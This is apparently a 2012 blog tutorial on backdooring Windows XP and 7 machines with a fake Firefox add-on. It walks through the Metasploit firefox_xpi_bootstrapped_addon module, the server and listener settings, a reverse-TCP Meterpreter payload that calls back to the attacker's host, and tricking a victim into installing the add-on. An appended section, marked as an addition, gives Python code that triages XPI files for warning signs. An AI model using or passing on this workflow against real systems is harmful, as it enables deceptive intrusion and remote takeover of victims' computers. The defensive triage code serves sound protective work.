Thursday, June 14, 2012

Hacking Windows 7 & XP with a Fake Firefox Add-on (XPI): Metasploit Tutorials



>What am I doing?
1. Create a fake Firefox extension with Metasploit that creates a backdoor from the victim system.
2. Trick users into installing the add-on.
3. Break into the Target machine.

>Pre-configuration:
*. As usual, you have to set up two virtual machines (VMs) in VirtualBox, named "Target" and "Attacker".
*. Install Windows XP or 7 in the Target VM.
*. Install BackTrack in the Attacker VM.

>Part I: Update Metasploit-

As we are going to use the latest module, you are advised to update the Metasploit modules. Don't know how to do this? No need to worry!
*. Open the Terminal.
*. Type msfupdate
*. This will update Metasploit with the latest modules.

>Part II: Configuring settings in Metasploit for the fake add-on exploit-

*Step 1:
Open the Terminal and type " msfconsole " to get the Metasploit console.
*Step 2:
Type " use exploit/multi/browser/firefox_xpi_bootstrapped_addon " in the console.
*Step 3:
Now we need the list of settings available for this exploit module. To get the list, type "show options" in the console.

*Step 4: Configurations-

Let us configure the settings for the exploit.
Type the following commands:

Command: set addonname fake

Details: Name for the fake add-on. You can change "fake" to any name.

Command: set SRVHOST 192.168.56.11

Details: Here 192.168.56.11 is the IP of the BackTrack machine. You can get this IP by typing "ifconfig" in the terminal.

Command: set SRVPORT 80

Details: Our server is going to be accessed via port 80 (the default port).

Command: set URIPATH fakeEx

Details: The path at which the fake add-on will be available for download. For example: http://192.1xx.5x.xx/fakeaddon

Command: set LHOST 192.168.56.11

Details: Here 192.168.56.11 is the IP of the BackTrack machine. You can get this IP by typing "ifconfig" in the terminal.

*Step 5: Payload-

As usual, we can use the reverse TCP payload for this attack as well. Type the following command in the Metasploit console:

set payload windows/meterpreter/reverse_tcp

>Part III: Social Engineering Attack-

With the settings for the exploit configured, what else? Let us launch the exploit.

Type "exploit" in the console.
Now the exploit is started. Our fake add-on is available at "http://192.1xx.5x.xx/fakeaddon".

Once the victim visits the link, it will ask the user to install the add-on in order to view the page. Once the user installs the add-on, the system will be backdoored.

Now you can control the victim system from Meterpreter.
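
From the defender's side, what the user is asked to install here is an XPI, and the module name says it is a bootstrapped one. The following added example (not from the original post or from Metasploit; the finding names and sample files are constructed) triages an XPI for a missing Mozilla signature file, bootstrap markers and bundled native binaries.

```python
import io
import re
import zipfile

# Heuristic triage of an XPI (a ZIP archive); all finding names are made up for this example.
BOOTSTRAP_FLAG = re.compile(rb"<em:bootstrap>\s*true\s*</em:bootstrap>", re.I)
NATIVE_SUFFIXES = (".exe", ".dll", ".scr", ".so", ".dylib")


def triage_xpi(data: bytes) -> list:
    """Return a list of findings for the XPI bytes; an empty list means nothing was flagged."""
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not-a-zip"]
    findings = []
    with archive:
        names = archive.namelist()
        # Mozilla-signed XPIs carry a PKCS#7 signature here. Presence only:
        # this does not verify the signature chain.
        if "META-INF/mozilla.rsa" not in names:
            findings.append("no-mozilla-signature")
        # Legacy restartless add-ons run bootstrap.js with full browser privileges.
        if "bootstrap.js" in names:
            findings.append("bootstrap-js")
        if "install.rdf" in names and BOOTSTRAP_FLAG.search(archive.read("install.rdf")):
            findings.append("bootstrap-flag-in-install-rdf")
        natives = sorted(n for n in names if n.lower().endswith(NATIVE_SUFFIXES))
        findings.extend("native-binary:" + n for n in natives)
    return findings


def build_sample(files: dict) -> bytes:
    """Build a constructed XPI in memory from {name: bytes} so the example runs offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


if __name__ == "__main__":
    suspicious = build_sample({
        "install.rdf": b"<RDF><em:bootstrap>true</em:bootstrap></RDF>",
        "bootstrap.js": b"// constructed placeholder",
        "components/helper.exe": b"MZ constructed placeholder",
    })
    print(triage_xpi(suspicious))
```

Any finding is a reason to keep the file away from a user's browser profile and inspect it by hand; an empty list is not proof that the add-on is safe.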
